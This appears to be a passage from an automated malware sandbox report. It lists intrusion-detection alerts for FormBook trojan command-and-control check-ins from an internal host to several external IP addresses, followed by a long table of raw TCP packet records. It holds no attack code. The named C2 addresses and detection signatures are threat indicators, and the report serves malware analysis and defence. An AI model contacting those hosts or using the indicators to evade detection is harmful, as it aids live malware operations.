                                                                                      09/15/21-11:20:49.990019TCP2031412ET TROJAN FormBook CnC Checkin (GET)4918880192.168.2.22184.168.131.241
                                                                                      09/15/21-11:22:05.612250TCP1201ATTACK-RESPONSES 403 Forbidden804919134.102.136.180192.168.2.22
                                                                                      09/15/21-11:22:43.718801TCP2031453ET TROJAN FormBook CnC Checkin (GET)4919580192.168.2.2234.102.136.180
                                                                                      09/15/21-11:22:43.718801TCP2031449ET TROJAN FormBook CnC Checkin (GET)4919580192.168.2.2234.102.136.180
                                                                                      09/15/21-11:22:43.718801TCP2031412ET TROJAN FormBook CnC Checkin (GET)4919580192.168.2.2234.102.136.180
                                                                                      09/15/21-11:22:43.833789TCP1201ATTACK-RESPONSES 403 Forbidden804919534.102.136.180192.168.2.22
                                                                                      09/15/21-11:22:53.937608TCP2031453ET TROJAN FormBook CnC Checkin (GET)4919780192.168.2.2234.102.136.180
                                                                                      09/15/21-11:22:53.937608TCP2031449ET TROJAN FormBook CnC Checkin (GET)4919780192.168.2.2234.102.136.180
                                                                                      09/15/21-11:22:53.937608TCP2031412ET TROJAN FormBook CnC Checkin (GET)4919780192.168.2.2234.102.136.180
                                                                                      09/15/21-11:22:54.053650TCP1201ATTACK-RESPONSES 403 Forbidden804919734.102.136.180192.168.2.22
                                                                                      09/15/21-11:23:04.410658TCP1201ATTACK-RESPONSES 403 Forbidden804919934.102.136.180192.168.2.22
                                                                                      09/15/21-11:23:09.429910TCP2031453ET TROJAN FormBook CnC Checkin (GET)4920080192.168.2.2234.98.99.30
                                                                                      09/15/21-11:23:09.429910TCP2031449ET TROJAN FormBook CnC Checkin (GET)4920080192.168.2.2234.98.99.30
                                                                                      09/15/21-11:23:09.429910TCP2031412ET TROJAN FormBook CnC Checkin (GET)4920080192.168.2.2234.98.99.30
                                                                                      09/15/21-11:23:09.545253TCP1201ATTACK-RESPONSES 403 Forbidden804920034.98.99.30192.168.2.22

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Sep 15, 2021 11:16:35.175262928 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.287193060 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.291636944 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.291671038 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.411237955 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.411433935 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.413852930 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.413883924 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.413907051 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.414019108 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.525995970 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.526036978 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.526066065 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.526093006 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.526125908 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.526148081 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.526154041 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.526170015 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.526187897 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.526190996 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.526194096 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.526211977 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.526226997 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638143063 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638185978 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638216972 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638246059 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638278008 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638305902 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638334036 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638355970 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638359070 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638385057 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638389111 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638410091 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638422966 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638453007 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638453007 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638473034 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638483047 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638495922 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638511896 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638525009 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638540030 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638552904 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638570070 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638573885 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638602018 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638618946 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638642073 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.642138004 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749579906 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749674082 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749707937 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749742985 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749744892 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749782085 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749794006 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749798059 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749813080 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749819994 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749842882 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749859095 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749876976 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749902010 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749908924 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749911070 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749942064 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749969959 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749975920 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749977112 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750011921 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750013113 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750047922 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750050068 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750081062 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750083923 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750114918 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750117064 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750149012 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750152111 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750180006 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750183105 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750211954 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750212908 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750246048 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750247002 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750281096 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750284910 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750322104 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750323057 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750355005 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750372887 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750386953 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750403881 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750417948 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750437021 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750449896 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750453949 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750482082 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750483036 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750516891 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750535965 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750551939 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750552893 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750593901 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750595093 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750628948 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750633001 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750665903 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750667095 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750701904 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750703096 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750741959 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.753743887 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.861774921 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.861810923 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.861834049 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.861888885 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.861896038 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.861912966 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.861917973 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862003088 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862008095 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862047911 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.862099886 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.862138033 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.862164021 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862171888 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.862183094 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862186909 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862202883 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.862220049 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862234116 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.862234116 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862279892 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.862301111 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862314939 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.862332106 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862349033 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.862349987 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862380981 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.862385035 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862415075 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.862416029 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862447977 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.862448931 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862479925 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862483025 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.862520933 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.862521887 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862552881 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.862555981 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862587929 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.862606049 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862626076 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.862627029 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862659931 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.862664938 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862694025 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.862695932 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.862735033 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865282059 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865312099 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865335941 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865339994 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865359068 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865361929 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865371943 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865382910 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865396023 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865425110 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865463972 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865488052 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865509987 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865515947 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865531921 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865540981 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865551949 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865554094 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865572929 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865576982 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865583897 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865596056 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865614891 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865619898 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865639925 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865652084 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865711927 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865722895 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865748882 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865761042 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865771055 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865783930 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865804911 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865842104 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865870953 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865880966 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865904093 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865904093 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865923882 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865947008 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865950108 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865966082 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865981102 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.866000891 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.866009951 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.866022110 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.866024017 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.866031885 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.866115093 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.880376101 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.886504889 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.973834038 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.973864079 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.973886013 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.973975897 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.974025965 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.974056005 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.974067926 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.974090099 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.974111080 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.974158049 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.974273920 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.974296093 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.974299908 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.977144957 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977309942 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.977358103 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977384090 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977423906 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977437973 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.977447987 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977462053 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.977500916 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.977524996 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.977546930 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977575064 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977591038 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.977610111 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977639914 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.977652073 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977668047 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.977689028 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977719069 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.977734089 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977735996 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.977756023 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977775097 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.977793932 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977804899 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.977818012 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977833033 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.977840900 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977861881 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977864981 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.977888107 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977891922 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.977910995 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977931023 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977937937 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.977952957 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977963924 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.977973938 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977996111 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.977999926 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.978017092 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.978024960 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.978038073 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.978058100 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.978061914 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.978085041 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.978094101 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.978106022 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.978118896 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.978127003 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.978142977 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.978148937 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.978179932 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.978192091 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.980232954 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.991988897 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.992018938 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.992038012 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.993197918 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.998182058 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.999633074 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.999866009 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.000008106 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.000089884 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.000139952 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.000153065 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.000157118 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.000159979 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.000163078 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.000708103 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.000788927 CEST4916780192.168.2.22198.23.212.143
